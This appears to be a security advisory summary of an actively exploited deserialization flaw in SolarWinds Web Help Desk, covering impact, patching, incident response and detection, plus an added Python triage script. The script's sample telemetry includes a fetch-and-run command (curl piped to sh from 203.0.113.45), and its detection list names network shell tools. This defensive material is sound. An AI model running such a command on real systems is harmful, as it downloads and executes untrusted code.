Full Report
CISA flags critical SolarWinds CVE-2025-40551 flaw as exploited in attacks. Learn all of the key details.
Analysis Summary
# Vulnerability: SolarWinds Web Help Desk Deserialization Flaw Leading to RCE
## CVE Details
- CVE ID: CVE-2025-40551
- CVSS Score: 9.8/10 (Critical)
- CWE: Deserialization of Untrusted Data
## Affected Systems
- Products: SolarWinds Web Help Desk (WHD)
- Versions: Versions prior to 2026.1
- Configurations: Any instance of WHD that an attacker can reach over the network. No authentication and no non-default configuration is required, so exposure alone is the attack surface.
## Vulnerability Description
The flaw is a "deserialization of untrusted data" bug in the **AjaxProxy component** of SolarWinds Web Help Desk. A remote, unauthenticated attacker who can reach the component can submit a crafted serialized object; when WHD deserializes it, the attacker's commands run on the underlying host in the context of the WHD service (Remote Code Execution - RCE). The same component has received earlier security fixes, and this issue appears to be a bypass of those fixes, so instances patched only against the earlier advisories should still be considered exposed.
## Exploitation
- Status: Exploited in the wild; added to CISA's KEV catalog.
- Complexity: Low. A CVSS base score of 9.8 corresponds to a network-reachable, low-complexity attack with no privileges and no user interaction required; no credentials are needed to reach the vulnerable component.
- Attack Vector: Network
## Impact
- Confidentiality: High (the WHD database holds support tickets, asset records, and frequently stored credentials and internal network details, all readable by code running as the service).
- Integrity: High (an attacker with code execution can modify or delete tickets, configuration and other system data).
- Availability: High (code execution on the host allows malware or ransomware deployment and service disruption).
## Remediation
### Patches
- **SolarWinds Web Help Desk version 2026.1** is the fixed version released on January 28, 2026. Federal agencies were mandated to patch by February 6, 2026.
### Workarounds
- No configuration-level workaround is identified. Until the patch is applied, remove the WHD instance from direct internet exposure and restrict access to it (in particular to the AjaxProxy component) to trusted networks or a VPN, since reachability is the entire precondition for exploitation.
- Any instance that was reachable while the vulnerability was being exploited should be treated as potentially compromised rather than merely unpatched: isolate it, rotate every credential the service could access (database, LDAP/Active Directory and mail service accounts, API keys stored in WHD), and complete a forensic review before returning it to service, consistent with CISA's KEV remediation requirements.
## Detection
- Indicators of Compromise: WHD is a Java web application, so the most reliable host-level signal is its JVM spawning a shell or interpreter (sh, bash, cmd.exe, powershell.exe) or other tools it has no reason to run; also watch for processes running as the WHD service account that were not started by the installer, unexpected outbound connections from the WHD host, new scheduled tasks or services, web shells dropped into the application directory, and unfamiliar malware or ransomware on the server.
- Detection methods and tools: Review web-server access logs for requests to the AjaxProxy component, especially POSTs from sources outside the networks that normally use the help desk; request bodies that carry a Java serialization stream (header bytes AC ED 00 05, or the base64 prefix rO0AB) to that component warrant immediate investigation. Alert on process-creation telemetry (EDR, Sysmon Event ID 1, auditd execve) where the parent is the WHD JVM. On any suspicion of compromise, perform a full forensic audit of the host rather than relying on log review alone.
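The two checks above, as an added triage script that is not part of the original report or of any SolarWinds or CISA tooling. It assumes process telemetry has been normalized to parent/child image paths, that the WHD JVM lives under a directory whose path contains "webhelpdesk" (adjust to the real install path), that access logs are in Apache/Tomcat combined format, and that the `/helpdesk/AjaxProxy` path, the `10.0.0.0/8` trusted range and all sample events are constructed for illustration.

```python
"""
Triage helpers for a SolarWinds Web Help Desk (WHD) host (added example).
  1. The WHD JVM spawning a shell/interpreter: the usual landing point of a
     deserialization gadget chain (Runtime.exec / ProcessBuilder).
  2. Requests to the AjaxProxy component from outside trusted networks.
All sample events and log lines are constructed, not real telemetry.
"""
import ipaddress
import re
from pathlib import PurePosixPath, PureWindowsPath

# Child images a Java web application should not normally launch.
SHELLS_AND_INTERPRETERS = {
    "sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh.exe", "pwsh",
    "python", "python3", "perl", "curl", "wget", "certutil.exe",
    "mshta.exe", "rundll32.exe", "nc", "ncat",
}

# Assumption: WHD's bundled JVM sits under a path containing this marker.
WHD_PATH_MARKER = "webhelpdesk"

# Apache/Tomcat combined-style access log line (constructed format).
ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def _basename(path: str) -> str:
    """Lower-cased file name of a POSIX or Windows path."""
    name = PureWindowsPath(path).name if "\\" in path else PurePosixPath(path).name
    return name.lower()


def is_whd_java(image: str) -> bool:
    """True if the image looks like the JVM that runs WHD."""
    return WHD_PATH_MARKER in image.lower() and _basename(image) in ("java", "java.exe")


def suspicious_child_processes(events):
    """Flag every child of the WHD JVM: shells/interpreters are high
    severity; any other child is medium because the JVM rarely forks."""
    findings = []
    for ev in events:
        if not is_whd_java(ev["parent_image"]):
            continue
        child = _basename(ev["image"])
        severity = "high" if child in SHELLS_AND_INTERPRETERS else "medium"
        findings.append({"severity": severity, "host": ev["host"], "user": ev["user"],
                         "child": child, "cmdline": ev["cmdline"]})
    return findings


def ajaxproxy_requests(lines, trusted_networks):
    """Return requests whose path names the AjaxProxy component, marking
    those whose source address is outside the trusted networks."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m or "ajaxproxy" not in m["path"].lower():
            continue
        src = ipaddress.ip_address(m["src"])
        hits.append({"src": m["src"], "method": m["method"], "path": m["path"],
                     "status": int(m["status"]),
                     "external": not any(src in n for n in nets)})
    return hits


# --- constructed sample data (install paths and addresses are assumptions) ---
SAMPLE_PROCESS_EVENTS = [
    {"host": "whd01", "user": "whd",
     "parent_image": "/usr/local/webhelpdesk/bin/jre/bin/java",
     "image": "/bin/sh", "cmdline": "sh -c 'curl http://203.0.113.45/x | sh'"},
    {"host": "whd01", "user": "whd",
     "parent_image": "/usr/local/webhelpdesk/bin/jre/bin/java",
     "image": "/usr/bin/whoami", "cmdline": "whoami"},
    {"host": "whd01", "user": "root", "parent_image": "/usr/sbin/cron",
     "image": "/bin/sh", "cmdline": "sh -c /etc/cron.daily/logrotate"},
    {"host": "whd02", "user": "NT AUTHORITY\\SYSTEM",
     "parent_image": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

SAMPLE_ACCESS_LOG = [
    '203.0.113.45 - - [29/Jan/2026:03:12:07 +0000] "POST /helpdesk/AjaxProxy HTTP/1.1" 200 512',
    '10.20.30.40 - - [29/Jan/2026:08:01:15 +0000] "GET /helpdesk/AjaxProxy HTTP/1.1" 200 1024',
    '10.20.30.41 - - [29/Jan/2026:08:02:00 +0000] "GET /helpdesk/Login HTTP/1.1" 200 4096',
    '203.0.113.45 - - [29/Jan/2026:03:12:09 +0000] "POST /helpdesk/AjaxProxy HTTP/1.1" 500 0',
]

TRUSTED_NETWORKS = ["10.0.0.0/8"]

if __name__ == "__main__":
    for f in suspicious_child_processes(SAMPLE_PROCESS_EVENTS):
        print("PROCESS", f)
    for h in ajaxproxy_requests(SAMPLE_ACCESS_LOG, TRUSTED_NETWORKS):
        print("REQUEST", h)
```

On the sample data the script reports the two shell spawns under the WHD JVM as high severity, the `whoami` child as medium, ignores the cron-launched shell, and lists three AjaxProxy requests of which the two POSTs from 203.0.113.45 fall outside the trusted range. The process check deliberately keys on the parent image rather than the service account, since a deserialization payload runs as whatever user owns the JVM and account-based rules miss nothing extra.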
## References
- SolarWinds security advisory for CVE-2025-40551 and the Web Help Desk 2026.1 release (not linked in the source).
- CISA Known Exploited Vulnerabilities catalog entry for CVE-2025-40551 (not linked in the source).